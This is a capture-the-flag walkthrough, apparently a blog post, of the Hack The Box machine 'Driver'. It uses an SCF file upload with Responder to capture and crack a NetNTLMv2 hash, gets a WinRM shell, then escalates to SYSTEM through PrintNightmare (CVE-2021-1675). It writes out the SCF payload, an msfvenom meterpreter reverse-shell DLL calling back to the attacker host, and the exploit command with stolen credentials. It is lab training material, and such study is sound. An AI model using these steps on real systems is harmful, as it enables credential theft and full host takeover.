HTB - Driver Detailed Walkthrough


This article was submitted to the Juejin "Newcomer Creation Gift" event.

0x01 Port Scanning

Use nmap to enumerate the open ports and the services behind them:

nmap -sV -sC -p- 10.10.11.106  

Note the full port range (-p-): the default top-1000 scan does not cover port 5985, and that port turns out to be essential later:

PORT     STATE SERVICE      VERSION
80/tcp   open  http         Microsoft IIS httpd 10.0
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=MFP Firmware Update Center. Please enter password for admin
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
135/tcp  open  msrpc        Microsoft Windows RPC
445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h15m00s, deviation: 0s, median: 7h14m59s
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-10-24T18:59:15
|_  start_date: 2021-10-24T04:13:17

0x02 User Shell

Browsing to port 80, the site asks for HTTP Basic authentication; admin:admin gets us in:


Apart from a file-upload form the site contains nothing useful. Uploading a file produces no response at all, which makes things awkward.


Directory brute-forcing did not reveal where uploads land, so we were stuck. Looking at the upload page again, the word "manually" is emphasised, and intuition says there is something interesting here.


Browsing the HTB forum, someone mentioned a "Windows-specific" technique. After some searching this turned out to be an SCF attack: when a user views a folder containing an SCF file in Explorer, Windows tries to load the IconFile from the UNC path over SMB and authenticates to that server with the user's NTLM credentials.

Construct the SCF file as follows (the UNC path points at our attacking host, where Responder will listen):

[Shell]
Command=2
IconFile=\\10.10.16.33\share\pentestlab.ico
[Taskbar]
Command=ToggleDesktop


Then start Responder, listening on the VPN interface:


Upload the malicious SCF file; shortly afterwards Responder captures a NetNTLMv2 hash for the user tony:


tony::DRIVER:bdf3633cc1b97438:083303BDA5669E8318761A18E5A9E23B:010100000000000080F7C40B0BC9D701FB88FCAB7AD7E8BA0000000002000800360043004700360001001E00570049004E002D00350030003100570044004D0033004F0035003100540004003400570049004E002D00350030003100570044004D0033004F003500310054002E0036004300470036002E004C004F00430041004C000300140036004300470036002E004C004F00430041004C000500140036004300470036002E004C004F00430041004C000700080080F7C40B0BC9D7010600040002000000080030003000000000000000000000000020000078F7201740AA3EEB44B5A2AD11535E46F3CE41F9DCD860C7E13A20E0401BCCC80A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E0033003300000000000000000000000000

Hashcat (mode 5600, NetNTLMv2) cracks the password: liltony.


With these credentials we can access the SMB shares, but unfortunately none of them is writable:


Back on the forum, someone suggested taking another look at the nmap results. Re-scanning the full port range revealed 5985, the WinRM port.

The Metasploit WinRM module failed:


But evil-winrm gets us a shell as tony:


0x03 Root Shell

Next, privilege escalation. First check whether the user holds any exploitable privileges; nothing useful:

whoami /priv


The box is called Driver and the web application's only feature is printer firmware updates, so the way up is probably printer-related.

So first check whether the Print Spooler service is present and running; it is:

Get-Service -Name Spooler


Searching turned up the recently published CVE-2021-1675, a Print Spooler flaw that lets a low-privileged user load an arbitrary driver DLL into the SYSTEM-level spooler, which is exactly a privilege escalation.

A reproduction of the vulnerability is described in a FreeBuf article, which we follow here.

First, configure Samba on the attacking host with an anonymously readable share; the exploit makes the Spooler fetch the DLL from it:

[global]
workgroup = workgroup
server string = test
netbios name = MZ
security = user
map to guest = Bad User
smb ports = 445
log file = /var/log/samba/log.%m
max log size = 5

[smb]
comment = Samba
browseable = yes
writeable = yes
public = yes
path = /tmp/
read only = no
guest ok = yes

After editing the configuration, restart the Samba service:

sudo systemctl restart smbd.service

Then generate a reverse-shell DLL with msfvenom and place it in /tmp, the directory backing the share:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.16.34 lport=6666 -f dll -o reverse.dll

Then start a Metasploit multi/handler for the matching payload (windows/x64/meterpreter/reverse_tcp on port 6666):


Finally run the exploit script with tony's credentials and the UNC path of the DLL; a moment later a meterpreter session arrives, running as SYSTEM because the DLL is loaded by the Spooler service:

python3 CVE-2021-1675.py tony:liltony@10.10.11.106 '\\10.10.16.34\smb\reverse.dll'

